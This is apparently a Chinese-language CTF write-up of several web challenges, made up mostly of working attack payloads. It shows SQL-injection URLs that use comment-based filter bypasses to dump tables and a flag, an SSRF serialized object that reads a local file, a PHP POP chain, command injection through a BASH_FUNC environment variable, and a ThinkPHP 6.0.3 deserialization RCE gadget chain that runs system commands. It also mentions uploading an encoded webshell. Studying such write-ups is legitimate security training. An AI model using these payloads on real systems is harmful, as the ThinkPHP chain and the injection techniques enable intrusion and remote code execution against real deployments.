100%_upload 将一句话木马 Base64 编码后上传,然后用 filter 将其 include。
hacker 试了下发现只有 ?username=flag
是有值的,那就接着写 SQL 吧!稍微有点过滤,问题不大:
1 2 3 4 5 6 7 8 view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database())%23 可以查到有这些表: flag, users view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b,%27,%27,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)as/**/d)%23 users 表里没啥东西 view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select/**/*/**/from/**/flag)as/**/d)%23 flag 真的在 flag 表里: flag, SICTF{5b6247d8-9e5b-4cbc-a579-9d779fec77ef}
EZ_SSRF 不要相信出题人说 Flag 在 /flag
1 2 3 4 5 6 7 8 9 10 11 12 class client { public $url ; public $payload ; } $target = 'file:///var/www/html/flag.php' ;$obj = new client ();$obj ->url = $target ;echo serialize ($obj );
Not just unserialize POP 链并不难构造:
1 2 3 4 5 6 7 8 $obj = new start ();$obj ->you = '233' ;$obj ->welcome = new SE ();$obj ->welcome->year = new CR ();$obj ->welcome->year->newyear = "WORRIES" ;$obj ->welcome->year->last = new ET ();print (base64_encode (serialize ($obj )));
有点难度的是利用环境变量进行 RCE,还好有参考资料 。
1 2 get[BASH_FUNC_echo%%]=%28%29%20%7B%20cat%20%2F%2A%3B%20%7D ^ () { cat /*; }
Oyst3rPHP 这题有源代码泄露直接 www.zip
把它扒下来一看果然是 ThinkPHP。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 public function index ( ) { echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈" ; echo "<img src='../Oyster.png'" . "/>" ; $payload = base64_decode (@$_POST ['payload' ]); $right = @$_GET ['left' ]; $left = @$_GET ['right' ]; $key = (string )@$_POST ['key' ]; if ($right !== $left && md5 ($right ) == md5 ($left )) { echo "Congratulations on getting your first oyster" ; echo "<img src='../Oyster1.png'" . "/>" ; if (preg_match ('/.+?THINKPHP/is' , $key )) { die ("Oysters don't want you to eat" ); } if (stripos ($key , '603THINKPHP' ) === false ) { die ("!!!Oysters don't want you to eat!!!" ); } echo "WOW!!!Congratulations on getting your second oyster" ; echo "<img src='../Oyster2.png'" . "/>" ; @unserialize ($payload ); } }
这部分并不难绕 ,主要还是 ThinkPHP 6.0.3 的反序列化 RCE。网上随便扒个 Exp 下来:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 namespace think \model \concern ;trait Attribute { private $data = ["key" => "cat /Oyst3333333r.php" ]; private $withAttr = ["key" => "system" ]; } namespace think ;abstract class Model { use model \concern \Attribute ; private $lazySave = true ; protected $withEvent = false ; private $exists = true ; private $force = true ; protected $name ; public function __construct ($obj = "" ) { $this ->name = $obj ; } } namespace think \model ;use think \Model ;class Pivot extends Model {} $a = new Pivot ();$b = new Pivot ($a );echo base64_encode (serialize ($b ));